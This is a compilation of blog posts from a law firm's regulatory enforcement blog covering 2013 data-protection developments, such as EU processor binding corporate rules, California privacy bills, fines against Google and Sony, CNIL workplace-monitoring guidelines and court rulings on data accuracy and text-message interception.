Global Regulatory Enforcement Law Blog : Global Regulatory Enforcement Lawyers & Attorneys: Reed Smith Law Firm: Government Contracts & Compliance

This post was written by Cynthia O'Donoghue.

The European Union (EU) data protection body, the Article 29 Working Party (A29WP), in April adopted new guidance on Binding Corporate Rules for Processors (BCPRs). The document supplements the opinion from June 2012, which listed elements required for valid BCPRs, by further clarifying what provisions and mechanisms must be included before BCPRs can be authorised. The BCPR process has been developed by the A29WP in response to a request from outsourcing providers to create a new legal instrument to legitimise international data transfers.

The new guidance emphasises that BCPRs are the preferred method for transfers of personal data from the EU to countries without “adequate levels of protection,” over other methods, such as the EU standard contractual clauses. BCPRs are preferred when transfers are voluminous and frequent between the primary data processor and sub-processors in the same organisation. BCPRs are also recognised within the mutual recognition scheme, such that authorisation of BCPRs by one EU member state will result in automatic authorisation in other participating EU member states.

Data controllers will remain responsible for ensuring that service providers only process data under their instructions, and that sufficient guarantees are in place to protect the personal data being transferred to a service provider and within that service provider group, even where BCPRs have been authorised.

The A29WP emphasises that the BCPRs must be binding both internally and externally, and recommends service providers implement strict and punitive policies or codes of conduct supported by intra-group agreements. For third-party sub-processors, service providers are required to enter into agreements requiring sub-processors to respect the same obligations as the processor group. The sub-processor agreement will need third-party beneficiary rights for the data controller and for data subjects. Service providers seeking authorisation for BCPRs will need to include extracts of relevant clauses in their authorisation application.

The guidance also specifies the limits imposed on the requirements for modifying authorised BCPRs and lists other compulsory clauses, such as provisions ensuring compliance, audit mechanisms and complaint handling, and a duty to cooperate with both the controller and the relevant data protection authority. The BCPRs must also designate a corporate member within the EU that will be liable for breaches of the BCPRs by members of the group outside the EU.

While this new tool was developed in response to calls from the outsourcing community, no BCPRs have been authorised to date, although the French authority, the CNIL, has admitted to having several applications pending.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (A29WP) adopted the Opinion on Data Protection Impact Template Assessment for Smart Grid and Smart Metering Systems (Opinion), which evaluates the Privacy Impact Assessment (PIA) template that the member states intend to adopt. The PIA, which was prepared by industry representatives, seeks to ensure that smart-meter operators comply with data protection rules; however, the A29WP pointed out a number of inadequacies in the template.

The EU initiative to roll out smart gas and electricity meters, which can send usage data via remote communications, underpins the desire for a more effective and efficient energy supply. In the Opinion, the A29WP points out the risk that smart-meter usage data may be used to infer information about “consumers’ use of specific goods or devices, daily routines, living arrangements, activities, lifestyles and behaviour.”

The energy supply industry expert group developed the PIA to ensure that smart-meter operators comply with data protection rules, and to facilitate compliance assessments by Data Protection Authorities, as well as to provide information to consumers.

The PIA template contains an eight-step impact assessment and provides step-by-step guidance on how to carry it out. The A29WP admitted the proposed template contains useful elements, but criticised the failure to include any method of directly assessing the foreseeable impacts on the data subjects, including the risk of price discrimination or criminal acts facilitated by unauthorised profiling. The A29WP also felt the PIA template confused risks and threats, and failed to match specific risks to controls based on best practice. Other criticism included that the PIA template lacked sufficient guidance on the concepts of vulnerability, calculating and prioritising risks, choosing appropriate mitigating controls, and appropriately allocating data protection responsibilities between the different stakeholders. The A29WP also recommended including an analysis of industry-specific risks and relevant controls.

The A29WP acknowledged that the industry expert group is preparing ‘best available techniques’ that may address some of the criticisms, but it would wait to see the techniques included within the PIA template before it is resubmitted for a further opinion.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Sarah Woo, Lisa B. Kim and Joshua B. Marker.

The California legislature is determined to be at the forefront in the development of data privacy law by drafting a number of data privacy protection bills that will impact companies’ obligations with respect to the disclosure, compilation, removal, or sharing of consumers’ personal information.

Click here to read the issued Client Alert.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Steven Boranian, Joshua B. Marker, Lisa B. Kim, and Tyler M. Layton.

In a significant victory, Delta Airlines’ demurrer to the enforcement action filed by the state of California was sustained without leave to amend. We previously wrote about the case here. California alleged that Delta’s mobile application was in violation of CalOPPA because its privacy policy was not reasonably available within the application itself, and because the privacy policy on the Delta website did not accurately describe the information-collection practices of the mobile application.

Judge Marla Miller of San Francisco Superior Court sided with Delta and sustained its demurrer to the complaint without leave to amend. Despite the defense win, however, the decision provides little guidance regarding CalOPPA and its remedies, because the court did not address the substance of the statute. Rather, the court found that the claims against Delta were entirely preempted by the Airline Deregulation Act, which preempts any state “law, regulation, or other provision having the force and effect of law related to a price, route, or service of an air carrier.” The court declined to rule on the arguments pertaining to the substantive reach of CalOPPA.

In short, the precedential value of this decision outside of the airline industry is up in the air. While the decision may set the groundwork for preemption arguments that can be made in other federally regulated industries, the decision itself provides little guidance on CalOPPA specifically. With the potential for hefty statutory penalties, CalOPPA is still a privacy statute that requires careful consideration with regard to every company’s mobile applications.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Permanent Representatives Committee (otherwise known as ‘Coreper,’ consisting of representatives from the Member States and responsible for preparing the work of the Council of the EU) has expressed support for the European Commission’s plans through legislative changes to open up public sector data for re-use across Europe.

The initiative, which is part of the pending update to the 2003 Public Sector Information Directive, would make all generally accessible (i.e., non-personal) public sector information available for re-use across all Member States. Developers, programmers, businesses and citizens will be able to access and re-use public sector data at low cost, and this is predicted to result in a significant boost to the European economy.

Through proposed revisions to the 2003 Directive, a new genuine right to re-use public information would be introduced, including access to information stored by libraries, museums and archives. The revised Directive would allow such bodies to charge at maximum the marginal cost for reproduction, provision and dissemination of the information, so as to ensure the recovery of costs or a reasonable return on investment in exceptional cases. The revisions would also encourage public sector bodies to make data available in open machine-readable formats. The programme would include geographical, health care, transport and statistical information, and through this wider availability of public data could potentially enable economic growth, bringing tens of billions of euros per year across the EU. Neelie Kroes, Vice-President of the European Commission, said: "Opening up public data means opening up business opportunities, creating jobs and building communities.”

The initiative would apply to non-personal public information only, but some privacy groups have already expressed concerns, stating that the open availability of data must be scrutinised to avoid the so-called ‘jigsaw effect,’ whereby large quantities of non-personal data can be used to re-identify anonymous data or to profile individuals.

While Coreper’s support for the initiative is noteworthy, the proposed new rules still need to be formally approved by the European Parliament.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman and Caroline Klocko.

Earlier this week, the Federal Trade Commission (FTC) issued Frequently Asked Questions for complying with the Children's Online Privacy Protection Act (COPPA). The FAQs are intended as a supplement to the already issued compliance materials. As we previously reported, the revised COPPA Rule is set to go into effect on July 1, 2013. For companies running websites that collect information from children under 13, COPPA compliance will be critical. The FAQs will provide helpful guidance to reach that goal.

To learn more please visit our sister blog, AdLaw By Request.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Katharina A. Weimer.

According to a press release Monday, the Hamburg Officer for Data Protection and Freedom of Information issued a fine in the amount of €145,000 against Google Inc. for illegal recording of information from Wi-Fi networks.

While Google’s cars roamed the streets in Germany during the years 2008-2010, they not only took pictures of houses and streets, but they also illegally collected information from Wi-Fi networks in the reach of the cars. Google admitted that this also encompassed content information, e.g., emails, passwords, photographs, chat protocols, etc. While the public prosecutor closed the proceedings in November 2012 without bringing an action, the Hamburg DPA picked up on this in an administrative proceeding and now concluded bindingly that Google Inc. negligently collected data without authorization to do so. Concurrently with issuing the fine, the DPA instructed Google Inc. to immediately delete all information so collected, which has apparently already been confirmed by Google Inc.

While Google Inc. was cooperative in clarifying this incident, and remains adamant that the company’s intention was never to collect this information at all, this clearly indicates that the company’s internal control mechanisms failed severely.

It comes as no surprise to the Hamburg DPA that incidents like this happen in multinational companies – with fines of up to €300,000 for intentional violations as a maximum, and €150,000 for negligent acts, a deterring effect cannot be achieved. The impending change to a penalty of up to 2% of the annual turnover of a company, to be introduced by the new European Regulation, is likely to significantly increase the motivation for companies to implement proper control mechanisms and supervise their implementation and functioning.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Katalina Chin.

MEXICO: New Privacy Notice Guidelines were introduced April 17, 2013, specifying the format and contents of privacy notices required for the direct or automated collection of personal data.

The Guidelines seek to enable data subjects to make free and informed choices, by ensuring that they are given information and an opportunity to consent and object to the collection of their personal data. Privacy notices must be provided prior to collection, and must be set out in Spanish and in a format that is clear, easy to understand, and not misleading. A simplified or short form privacy notice can be justified in certain circumstances, but must inform data subjects where they can access a fuller privacy policy. The latter must contain, among other information, the data controller’s identity, the purposes of collection, and the rights of the data subject. The addendum to the Guidelines also provides additional recommendations, including special rules for handling the data of children.

Compliance with the Guidelines is mandatory and no exemptions are available. They will be particularly important to businesses operating in the jurisdiction processing personal data of its employees, customers and/or vendors, and/or website operators placing cookies in Mexico. The Instituto Federal de Acceso a la Información y Protección de Datos (IFAI) is already exercising its enforcement powers, including the issuing of monetary penalties. In December 2012, the IFAI fined a Mexican pharmaceutical company a total of 2 million Mexican pesos (approximately US$162,000), giving a clear indication of its actions on data privacy violations.

COLOMBIA: Following the lead of Costa Rica and Peru, Colombian Law No. 1581, having introduced its first data protection frameworks in March this year, came into force April 18, 2013. The new law covers, among other matters, notice and consent requirements, cross-border data transfers, and the processing of children's personal data. In a vein similar to the IFAI in Mexico, the new Colombian data protection regime is supported by serious sanctions, which include monetary penalties of up to US$650,000, up to six-month trading suspensions, and even temporary or permanent closure of business operations for persistent violations.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Lisa B. Kim, Joshua B. Marker and Paul Bond.

California continues to be among the most aggressive states in proposing legislation restricting disclosure of personal identifying information. Earlier this month, California Senate Majority Leader Ellen M. Corbett (D) introduced SB 501, known as the Social Networking Privacy Act, which would require social networking websites to remove certain personal identifying information (PII) within 96 hours of the user’s request. SB 501 specifically defines personal identifying information to mean a person’s name, address, telephone number, driver’s license number, social security number, employee identification number, mother’s maiden name, demand deposit account number, savings account number, or credit card number. A social networking site would have to remove all such PII or face a steep civil penalty, up to $10,000 for each knowing violation. The Bill allows for parents to make the removal request on behalf of children who are younger than 18.

SB 501 follows on the heels of related legislation in the California Assembly, the “Right to Know Act of 2013,” that requires businesses to disclose which personal information it retains and/or discloses to third parties upon the consumer’s request.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Christine E. Nielsen.

Federal Trade Commissioner Julie Brill, in a speech Monday at the National Association of Attorneys General (NAAG) Presidential Initiative Summit, urged the states to take a more active role in investigating and holding accountable data brokers for violations of the Fair Credit Reporting Act (FCRA).

The FCRA regulates the use of credit report information for credit and insurance eligibility decisions, and also in background checks and other investigative reports. The traditional actors in this space have seen increasing competition from entrants into the market, many of which may not be aware of FCRA’s broad reach and statutory requirements. For example, the FTC recently notified entities that compile rental history data that they are likely subject to FCRA and must abide by its requirements.

The attorneys general have publicly pursued several privacy-related investigations and enforcement actions since Attorney General Gansler announced his “Privacy in a Digital Age” Presidential Initiative. The California attorney general has recently provided guidance to and engaged in enforcement actions against entities active in the mobile application space. And the attorneys general have recently concluded an enforcement action against Google, which resulted in a $7 million settlement for Google’s alleged interception of personal data through its Street View vehicles. Still, the FTC, and not the states, has pursued data brokers for FCRA violations.

Data brokers have long been of interest to the FTC, which singled the industry out as one that needs special attention in its 2012 privacy report. Regulators justify heightened scrutiny because data brokers amass large quantities of valuable consumer data, but are often unknown to consumers. The state attorneys general as a multi-state group investigated and eventually settled with ChoicePoint following that data broker’s 2004 security breach, and individually have investigated entities that engaged in pretexting to obtain and compile phone record data.

As we enter the final few months of Attorney General Gansler’s term as NAAG President, we will keep a close watch on whether the attorneys general answer Commissioner Brill’s call-to-action.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue and Katalina Chin.

The Spanish Constitutional Court has dismissed a case brought by an employee whose online communications were inspected by his employer. The opinion in the case of Ruiz Medina v. Global Sales Solutions Line (published 22 January 2013) was a noted change in the Constitutional Court’s line of judgments, which usually supports employee rights.

In 2004, Global Sales Solutions discovered the communications of employees using an instant messaging system that they had installed on a work computer in breach of company policy. The discussions included insulting comments about colleagues, managers and customers. After the responsible employees were identified, the company called a meeting during which some of the comments were read out and the authors were reprimanded, which was in turn met by a legal action brought by one of the reprimanded employees.

Spanish privacy law prohibits illegal access to individuals’ personal data, while the right to secrecy of communications prevents interception or obtaining knowledge of secret communications. These rights are enforceable by employees in the workplace and were relied upon by the employee against Global Sales Solutions. The case was dismissed by the Seville court, stating that there was no violation of privacy, because of the prohibited use of company property during work. After this decision was upheld by a senior court, the claimant filed with the Constitutional Court relying on Article 18.3 of the Spanish Constitution, which protects secrecy in communications.

The Constitutional Court held that the right to privacy was waived because the computer was configured for common use and communications were set out as ‘open’. The court also pointed out that the unauthorised installation of communication programmes was banned at the company, and therefore there could have been no expectation of confidentiality. There was one dissenting opinion, which focused on the fact that the employer did not need to access the communications to confirm the breach of company policy.

Although the conclusion of this case may be somewhat surprising seeing as the Constitutional Court historically favours employee rights, Spanish employers will welcome this opinion which has helped set reasonable limits to the right of privacy in the workplace.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

New research from the University of Cambridge shows that information disclosed on Facebook profiles can be used to accurately predict a range of undisclosed sensitive personal data, including sexual orientation, ethnicity, religious and political views, age, and gender.

The research, which involved a study of the Facebook “Likes” of about 58,000 volunteers, found that highly sensitive information could be deduced from those “Likes” with a very high degree of accuracy. For example, the study correctly predicted male sexuality in 88% of cases, ethnicity in 95% of cases, and political views in 85% of cases. The report’s authors admitted using relatively simple methods to make their predictions but emphasised that there was great scope for improvement both in terms of models and data sets used.

This study is significant on a number of grounds. First, it reminds us of the ease with which it is possible for individuals to inadvertently disclose sensitive information about themselves. Second, it highlights the risks of organisations drawing conclusions and/or making decisions about the individuals in question based on the predictions made, some of which could be adverse to the individual. Third, the report also gives credence to the ongoing debate about whether data can ever be truly anonymous, especially as the techniques used in the study are likely to be used by most organisations trying to analyse and monetise big data sets, whether it be for behavioural profiling to assist online behavioural advertising, or strategies related to product development.

A key question is whether the study will impact the deliberations related to the proposed EU General Data Protection Regulation. Most data protection regimes, including in the EU, currently have stricter rules when ‘sensitive data,’ such as sexuality or religious beliefs, are involved. The draft Regulation contains clauses related to the profiling of individuals, as well as to anonymous data. The current draft Regulation would permit individuals to object generally to any profiling of themselves via big data sets or when done for direct marketing purposes, and retains the rule in the Directive on the re-identification of anonymous data. It remains to be seen how the relevant authorities will treat big sets of data which do not explicitly include, but which can be used to accurately predict, information covered by such specific regimes. It is possible that the trend for ‘big data’ will result in additional businesses becoming subject to more scrutiny by the regulatory authorities and more stringent privacy requirements.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In February 2013, Mexico became the second approved participant in the Cross-Border Privacy Rules (CBPR) programme - a system for convenient cross-border data transfers introduced in 2011 by the Asia-Pacific Economic Cooperation (APEC). At the same time, APEC and EU Data Protection Authorities (DPAs) plan to create a unified cross-border system covering both regions. This will be a welcome development likely to stimulate global trade.

APEC operates as a forum, of 21 countries from the Asia-Pacific region, promoting a free and open market and encouraging economic integration. One of its recent initiatives is the CBPR system, which involves companies adopting internal privacy rules assessed by accountability agents. This promotes unified data privacy policies for businesses operating throughout APEC economies. APEC leaders pledged to implement the programme in November 2011. The first country to join the system in July 2012 was the United States.

At the same time, representatives of APEC and the EU have begun discussions on creating a unified cross-border system. Achieving this will be helped by the fact that APEC’s CBPR and the EU’s binding corporate rules (BCRs) are very similar. Both systems involve companies developing internal policies for international transfers that are approved by third party authorities. A key difference, however, is that BCRs ensure that EEA businesses can transfer data to affiliates outside the EEA without breaching EU law, whereas the CBPR system is designed to promote transfers of data within the Asia-Pacific region. The French DPA (CNIL), which represents the EU in these discussions, has studied the similarities and differences between the two systems and carried out preliminary work on developing the unified mechanism. An initial road map for the project will be prepared by the APEC and the Article 29 Working Party in the coming months. Once introduced, the new system promises to bring much needed certainty for businesses operating or planning to operate in both regions.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (the “ICO”) has served a monetary penalty notice of £250,000 on Sony Computer Entertainment Europe following the hacking of Sony’s PlayStation Network in April 2011, which it described as a serious breach of the UK Data Protection Act (the “Act”). The ICO stated that Sony did not take "appropriate technical measures" to protect the security of customers’ personal data stored on the network, but it’s been reported that Sony strongly disagrees with this ruling and is planning an appeal.

The ICO penalty notice report alleged that the Network Platform was infiltrated following a number of Distributed Denial of Service (“DDoS”) attacks on various online networks of the Sony group. A DDoS attack is an attempt by hackers to make a resource unavailable to legitimate users through the use of malware installed on an infected computer. Whilst there are clearly ways of reducing the likelihood of attacks, DDoS are serious and unfortunate methods of 21st century e-crime.

The incident, in which personal details of gamers, including names, addresses, passwords and credit card numbers, were hacked, was described by the ICO as "likely to cause substantial damage or substantial distress," and left the customers exposed to a risk of identity theft. Having shut down the PlayStation Network during the investigations, Sony overhauled the entire system’s security infrastructure before re-granting access for customers.

Sony issued a statement strongly disagreeing with the ICO and indicating that it will appeal the monetary penalty notice. According to the statement, despite the ICO recognising that Sony was the victim of a criminal attack and that there was no evidence that encrypted payment card data was accessed or likely to be used for fraudulent purposes, a penalty was still issued. Sony acknowledged that criminal attacks on networks are on the increase and that it continually works to keep its networks resilient, secure and safe, because protecting its users’ data is of utmost importance.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

The French Data Protection Authority (DPA), the CNIL, has expressed its satisfaction on the draft report (the “draft Report”) released by the European Parliament on the new European Data Protection Regulation (the “Regulation”).

One of the major points of concern for the CNIL was that the draft Regulation had proposed that the competent DPA to rule over a complaint was to be the DPA where the data controller had its main establishment.

The CNIL considered in January 2012 that “In practice, this means that where a web user has a problem with a social network which main establishment is in another member state, the complaint will be handled by the authority of the latter,” resulting in practice in less protection for citizens given the broadening gap between European Data Protection Authorities, especially with the UK Commissioner.

The CNIL therefore welcomes warmly the conclusions of the European Parliament’s Committee on Civil Liberties, Justice and Home Affairs report that was published a couple of weeks ago. The amendments tabled by the rapporteur, Mr Albrecht, are considered by the CNIL as “real progress and an important stepping stone.”

Four major items have been highlighted by the CNIL:

• Criterion of competence of the supervisory authorities:
  The draft Report changes the “rules of jurisdiction” and sets forth that the place of residence of the citizen will be used as criterion of competence instead of the main establishment. The CNIL will in that respect regain power (and jurisdiction) over complaints filed in France, even if the main establishment of the data controller is located outside France.
   
• Single point of contact:
  According to the draft Report, the lead authority will be designated as single point of contact for controllers and processors who have activities in more than one Member State. This authority would have to instruct cross-border situations in the name and on behalf of all the competent authorities, and to ensure coordination before adopting a decision. The CNIL sees here a real opportunity to expand its area of influence. The fight against Google that this blog has been following is to be seen in that respect as a real life test.
   
• Role of the European Data Protection Board (EDPB):
  The CNIL welcomes the creation of the EDPB that would help to generate a harmonized implementation of the European rules and would have decisional power. According to the draft Report, the EDPB would draft guidelines for the supervisory authorities, and deliver opinions on the codes of conduct drafted at EU level. Moreover, the EDPB would have to be consulted by the European Commission in the preparation of delegated acts and implementing acts, which number would be much reduced.
   
• Protection of citizens’ rights:
  The draft Report improves citizens’ rights by the use of ‘pseudonymisation' and anonymisation of data, as well as by the free exercise of a right to object and the clarification of what constitutes the expression of consent in the online environment.

The CNIL finally welcomes the removal by the draft Report of the possibility to use non-binding legal instruments in the context of data transfers to non-EU Member States.

All in all, this draft Report constitutes a strong support for the “hardliners” led by the CNIL in the on-going discussions on the draft Regulation.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Joshua B. Marker and Lisa B. Kim.

California legislators have proposed revisions to the Shine the Light Act, which we first wrote about here. Under pending legislation, the Shine the Light Act would be renamed the “Right to Know Act of 2013,” with significantly expanded reach and requirements. If the proposed amendment passes, it would expose any company doing business with California consumers to new duties of information disclosure, and the potential for more class action litigation if a consumer alleges the company did not follow the complex law to the letter.

If passed, the Act would significantly change the manner in which California’s Shine the Light Act currently functions. First, it would apply to all businesses that retain and/or disclose a customer’s personal information, as opposed to only those businesses that have an “established business relationship.” Second, it would expand the categories of personal information that the business must disclose to include location, buying habits, and sexual orientation. Third, it would require the business to disclose what information has been given to any third party, and not just that which was used for telemarketing, mailings, and other direct marketing purposes. Finally, the bill as written would further the efforts of the plaintiffs’ class action bar to enforce the Act’s terms via class action lawsuits (seeking up to $3000 per violation). The bill specifically states that a violation of the Act would be “deemed to constitute an injury to a customer,” an attempt to defeat a major hurdle that similar class action lawsuits faced under the Shine the Light Act.

The retention of personal information for certain purposes is exempted from the proposed Act. These purposes include processing payments, providing customer service, verifying customer information, and addressing fraud, security or technical issues. Even with these exemptions, the Right to Know Act would represent a substantially more draconian set of rules than even the current Shine the Light Act. Every company that does business with California consumers must act now to have a firm understanding of what types of information the company is collecting and how that information is shared, or risk being unable to comply with California law.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

The French CNIL has adopted and published a new set of guidelines that set forth “best practices” about privacy protection at work (the Guidelines).

As is often the case in France – in particular if connected to labor law regulations – the lector should bear in mind that the wording “best practices” encompasses in reality binding guidelines: in fact, these guidelines are supported by French Labor law and case law that protects the privacy of individuals and the secret of their correspondences, even at work. This blog has recently highlighted an example in that respect.

Many companies have provided their employees with a company email account as well as a professional computer.

However, employees can use these tools during their breaks and can create or use some personal documents on their computer. They can also have some personal email on their professional address.

Therefore, is everything that is saved on these professional tools to be automatically considered as professional?

The CNIL offers some responses showing that the answer is not that clear:

1. Can employers monitor Internet access?

Employers may want to monitor or control Internet usage, or use Internet filtering software to block access to specific sites. According to the Guidelines, employers can monitor Internet use such as web-surfing and electronic mail. They can keep track of the list of websites visited and of the amount of time an employee spends online. However, they cannot use “keyloggers” to track all activities on a computer.

Any monitoring must be declared by employers to the CNIL. Employers must inform their employees about the procedure in place, its aim and duration. 

2. What can employers look at on their employee’s computer?

• Company email account

If a professional email system is used at the company, the employer is allowed to review its contents. However, even though the emails will be sent or received on a company email account, employers cannot have a totally free access to these emails.

Employers cannot access any email marked as “private” or “personal,” except during a trial, and based on a court order.

Employers cannot receive a copy of every email sent by employees.

• Files

Employers can in principle access any file on the professional computer.

However, if files or document folders are marked as “personal” or “confidential,” employers can only access these in the presence of the employee or after calling him, or in case of a risk or particular event. Even document seizures of personal files must be implemented in the employee’s presence.

3. What if an employee is on holiday?

If an employee is absent, the employer should try to access the researched documents through network access.

If this does not work, the employer can then request the network administrator to access these documents.

Finally if access is still impossible, then the employer can obtain the employee’s password, but this procedure has to remain exceptional, and only if there is no other choice and if it remains indispensable to overcome the employee’s privacy for the benefit of the company. The employer would be well advised to keep record of all these steps.

4. How can employers inform employees?

The CNIL recommends in that respect that employers set up policies in their companies to notify their employees of every rule, or monitoring procedure in place.

5. What are the consequences during a trial? 

The first principle set forth by the Guidelines is that employers cannot use the result of illegal monitoring during a performance evaluation or against an employee under disciplinary procedure.

In the same way, documents that have been seized in breach of the Guidelines will not be considered as evidence in a trial and will be rejected by the judge.

Adequate collection of evidence is therefore key, since this can completely reverse the outcome of the procedure. 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

Pursuant to their common decision 26 February 2013 to engage action in order to penalize Google Inc. for refusing to revise its global privacy policy, six of the European Working Party 29 regulators, led by the French CNIL, have now jointly started to act in their respective jurisdictions and according to their national laws against Google Inc.

The CNIL reported 02 April 2013 that, after having met (at their demand) with representatives of Google Inc. on 19 March, the six Data Protection Authorities (DPA) of France, Germany, Italy, Spain, the Netherlands and the UK have on the same day engaged action based on the conclusion that no substantive change needed to be acknowledged.

The CNIL announced that such action, which would typically comprise a preliminary inquiry and controls, would immediately start at the step of controls since the inquiry has been implemented over the past months and has led to substantive exchanges between the CNIL and Google Inc. (our blog has extensively reported on these exchanges).

The CNIL also announced that it would implement an international administrative cooperation procedure with the other European DPAs in that regard.

This joint action, which remarkably includes the UK Information Commissioner, evidences an undoubtedly strong show of European DPAs’ willingness to force international, and in particular U.S. companies, to comply with European Data Protection regulation on major European markets.

It is to be seen as the first “real life” cooperation test in the framework of what new European Data Protection Regulations are scheduled to set up, and therefore to be monitored very closely, which this blog will continue to do.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Court of Appeal overturned a previous decision relating to the breach of the Fourth Data Protection Principle, which requires that personal data be accurate and kept up to date. Smeaton v Equifax plc confirms that the UK Data Protection Act 1998 (DPA) does not impose an unqualified duty to ensure absolute accuracy of personal data being processed, and that the duty to keep data accurate does not create a parallel duty in tort.

The appeal related to a judgment in the High Court issued by HHJ Thornton QC, which held that Equifax, a credit reference agency (CRA), had breached its obligation under the Fourth Data Protection Principle by processing incorrect data about the claimant’s credit history to the effect that he was subject to a bankruptcy order, even though the order had been rescinded.

The judgement in the High Court found that Equifax had breached the Fourth Data Protection Principle, as well as the First (fair and lawful processing) and the Fifth (personal data shall not be kept for longer than necessary), and these breaches had caused the claimant’s loss.

The erroneous bankruptcy order had remained on the claimant’s credit record for several years, but the appellate court found that the Fourth Principle is not violated where the data controller has taken reasonable steps to ensure the accuracy of the data, which will be fact specific to a particular case. Only where reasonable steps have not been taken would a claimant be entitled to compensation. Particular weight was placed on governmental guidance putting the responsibility on individuals whose bankruptcy has been annulled or rescinded, to inform CRAs of that fact. On appeal, Equifax was found to have taken reasonable steps given the context of CRA regulation, consumer credit and insolvency legislation. The Court of Appeal judgment puts emphasis on the fact that, contrary to the initial decision, the Fourth Principle is not an absolute and unqualified obligation, but rather one based on the question of reasonableness. Since the CRA took reasonable steps to ensure the accuracy of the data, including obtaining the data from a reliable and authoritative source – the London Gazette – it was not in breach of DPA, even if the data was ultimately inaccurate.

In addition, the initial decision found that the CRA’s obligations under the DPA as a data controller resulted in it owing a duty of care to Mr Smeaton in tort. This was again rejected by the Court of Appeal, which referred to the principle that statutory duties cannot generate parallel common law duties. Moreover, on the facts of the case, the alleged losses suffered were considered too remote from any alleged breach of the DPA to give rise to liability.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark S. Melodia and Frederick Lah.

On March 27, the Supreme Court of Canada held that the police must obtain a judicial wiretap order to get text message records from service providers, as opposed to a general warrant, which is easier to obtain.

In this case, the police obtained a general warrant requiring Telus, a national telecommunications company in Canada, to provide copies of the stored text messages of two of its subscribers. Telus applied to quash the general warrant, arguing that the acquisition of text messages from its database constitutes an interception of “private communications,” and therefore requires authorization under the wiretap authorization provisions of Part VI of Canada’s Criminal Code. After the lower court dismissed Telus’ application, the Supreme Court ruled 5-2 in striking down the general warrant, ruling that the police could not obtain the data without a more stringent court order that permitted the police to conduct wiretapping. The basis for the court’s ruling was that text messages are private communications and that restrictions should be in place for the police to obtain and disclose those messages. According to the majority:

“Text messaging is, in essence, an electronic conversation. Technical differences inherent in new technology should not determine the scope of protection afforded to private communications. The only practical difference between text messaging and traditional voice communications is the transmission process. This distinction should not take text messages outside the protection to which private communications are entitled under Part VI.”

In the United States, wiretapping and surveillance issues continue to appear before the U.S. Supreme Court and lower courts as well. See U.S. v. Jones and more recently, Clapper v. Amnesty International, which we previously analyzed. An underlying issue in all of these cases is how to apply long-standing constitutional schemes to new forms of communications. The U.S. Supreme Court seems hesitant to issue a broad ruling that would apply to all forms of electronic communications, perhaps, at least in part, because of the rapidly evolving nature of technology and communications. As courts across the nation (and in other countries) consider these issues, we’ll continue to follow these cases closely.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On Data Privacy Day, 28 January 2013, the Market Research Society launched a ‘Personal Data Mark’ intended to be used by private companies operating on the Internet to build trust with the general public in their data processing procedures.

In an effort to increase awareness and provide an easily identifiable symbol of trust for consumers, the mark, otherwise known as the ‘Fair Data Badge,’ will be available on companies’ websites to demonstrate their compliance with ethical, fair, and proper collection, use and retention of data subjects’ personal data.

Only organisations which agree to adhere to 10 core principles will be eligible to apply for the Fair Data Badge. Reflecting the Data Protection Principles as contained in the Data Protection Directive 95/46/EC, the ‘Fair Data’ principles include provisions for consent to be obtained prior to collection, only using data collected for the purpose it was intended to be collected for, rights of access for data subjects, and efficient data security measures, amongst others.

Jane Frost, the Market Research Society’s CEO, demonstrated the importance of increasing transparency to consumers by declaring that “public concern [over online privacy] is at an all-time high.” The UK Information Commissioner Christopher Graham also lauded the badge initiative “as a step in the right direction of getting users of public data to make such a public commitment to standards.”

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donogue.

During its 6th Annual Meeting, The Association of Francophone Data Protection Authorities (AFAPDP) decided to postpone the adoption of a new framework for international data transfers between French-speaking nations. DataGuidance reports that after considering the proposals, the AFAPDP members decided that they need additional time to assess them. This means that the new regime, which is likely to have a major impact on many international businesses operating within francophone countries, may not be introduced until the end of 2013.

An AFAPDP spokesperson confirmed that the framework under consideration is heavily based on the European model of Binding Corporate Rules (BCR), but with an additional agreement of cooperation between the francophone DPAs. Introduction of a unified system throughout among French-speaking countries is likely to be welcome news by the industry. The postponement could also mean that the framework may accommodate and be adapted to take account of the draft EU General Data Protection Regulation, which is scheduled to be voted on in May.

The proposed framework is AFAPDP’s reaction to the lack of international data transfers regulations and a response to other regional frameworks in this area. As underlined by Jean Chartier, President of the AFAPDP and the Quebec DPA, an important part of the on-going process is to create a stable and comprehensive francophone domain of data protection. He also expressed hopes that the AFAPDP developments will encourage all francophone governments, especially those in Africa, to introduce adequate data protection regimes.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Dutch Data Protection Authority (CBP) has published new guidelines on data protection and implementation of data security principles, which replace the previous guidance from 2001. The guidelines seek to provide practical advice on how data controllers and processors can ensure compliance with the Dutch Data Protection Act (Wet bescherming persoonsgegevens).

The new guidelines include a theoretical outline of the Dutch data protection regime, and practical instructions on how to implement it. For example, the document suggests that Dutch companies should deploy security measures, such as access control, logging, incident response management, confidentiality agreements and encryption.

The new guidance differs from the 2001 version in that it does not include mechanisms for assessing the sensitivity of data processing that had been included in the prior guidance, which would have aided controllers in determining what measures should be implemented in specific situations.

The guidance has been released just as a new Bill on data security is scheduled to be introduced to the Dutch Parliament some time in April; it includes a breach notification obligation and a maximum fine of €200,000 for non-compliance.

• Print
